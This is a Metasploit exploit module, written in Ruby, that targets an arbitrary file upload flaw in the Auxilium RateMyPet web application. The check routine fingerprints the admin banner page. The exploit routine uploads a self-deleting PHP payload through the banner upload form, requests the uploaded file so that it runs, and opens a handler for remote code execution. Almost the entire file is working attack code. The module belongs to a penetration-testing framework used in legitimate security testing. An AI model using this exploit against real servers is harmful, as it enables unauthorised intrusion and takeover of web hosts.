metasploit-framework/modules/exploits/multi/http/auxilium_upload_exec.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Auxilium RateMyPet's. The site
        banner uploading feature can be abused to upload an arbitrary file to the web
        server, which is accessible in the 'banner' directory, thus allowing remote code
        execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'DaOne',  # Vulnerability discovery
          'sinn3r'  # Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '85554'],
          ['EDB', '21329']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Platform'       => %w{ linux php },
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 14 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base directory to the application', '/Auxiliumpetratepro/'])
      ], self.class)
  end


  def check
    uri = target_uri.path
    base = File.dirname("#{uri}.")

    res = send_request_raw({
      'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
    })
    if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end



  def upload_exec(base, php_fname, p)
    data = Rex::MIME::Message.new
    data.add_part('http://', nil, nil, "form-data; name=\"burl\"")
    data.add_part('', nil, nil, "form-data; name=\"alt\"")
    data.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")
    data.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")

    post_data = data.to_s
    post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data,
    })

    if not res
      print_error("#{peer} - No response from host")
      return
    end

    print_status("#{peer} - Requesting '#{php_fname}'...")
    res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
    if res and res.code == 404
      print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
      return
    end

    handler
  end


  def exploit
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    base = File.dirname("#{uri}.")

    php_fname =  "#{Rex::Text.rand_text_alpha(5)}.php"

    p = get_write_exec_payload(:unlink_self=>true)

    upload_exec(base, php_fname, p)
  end
end